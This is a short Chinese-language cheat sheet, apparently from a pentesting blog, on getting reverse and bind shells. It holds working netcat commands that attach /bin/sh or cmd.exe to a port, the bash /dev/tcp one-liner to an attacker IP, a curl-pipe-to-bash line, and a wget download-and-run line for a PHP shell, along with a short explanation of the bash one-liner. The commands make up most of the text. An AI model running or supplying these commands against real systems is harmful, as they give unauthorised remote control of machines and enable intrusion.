反弹shell

监听,弹弹弹

反弹shell姿势

netcat 一句话反弹

获取shell(想反弹谁的shell就在谁的后面加-e /bin/sh-e /bin/bash

正向shell

客户端主动连接服务器并获取服务器shell

1
2
3
4
5
客户端主动连接并得到反弹shell    
nc 服务端ip 8888
服务端监听连接
nc -lvp 8888 -e /bin/sh
# windows上:nc -lvp 8888 -e c:\windows\system32\cmd.exe

反向shell

服务器端连接并反弹shell给客户端

1
2
3
4
5
6
客户端监听
nc -lvp 8888
服务端连接客户端
nc 客户端ip 8888 -e /bin/sh

windows上:nc ip 8888 -e c:\windows\system32\cmd.exe

bash反弹shell

1
bash -i >& /dev/tcp/我们靶机ip/我们靶机 port 0>&1

bash一句话命令详解
以下针对常用的bash反弹一句话进行了拆分说明,具体内容如下

image-20221019235717724

其实以上bash反弹一句完整的解读过程就是:
bash产生了一个交互环境与本地主机主动发起与目标主机8080端口建立的连接(即TCP 8080 会话连接)相结合,然后在重定向个tcp 8080会话连接,最后将用户键盘输入与用户标准输出相结合再次重定向给一个标准的输出,即得到一个bash反弹环境。

在反弹shell时要借助netcat工具反弹

curl反弹shell

前提要利用bash一句话的情况下使用curl反弹shell

在存在命令执行的服务器上执行

1
2
curl [自己的服务器]ip|bash
//在利用curl里执行我自己的服务器上的bash一句话

ipindex文件上含有bash一句话,就可以反弹shell

例如在自己的服务器index文件上写上一句话

1
bash -i >& /dev/tcp/192.168.20.151/7777 0>&1

192.168.20.151就是作为监听端口的服务器【攻击机】用来得到反弹的shell。

image-20221020000027288

存在一句话,利用curl反弹。
kali开启监听

image-20221020000337460

wget方式反弹shell

利用wget进行下载执行

1
wget 192.168.20.130/shell.txt -O /tmp/x.php && php /tmp/x.php

利用下面贴出的php进行反弹。
开启监听

image-20221020000353533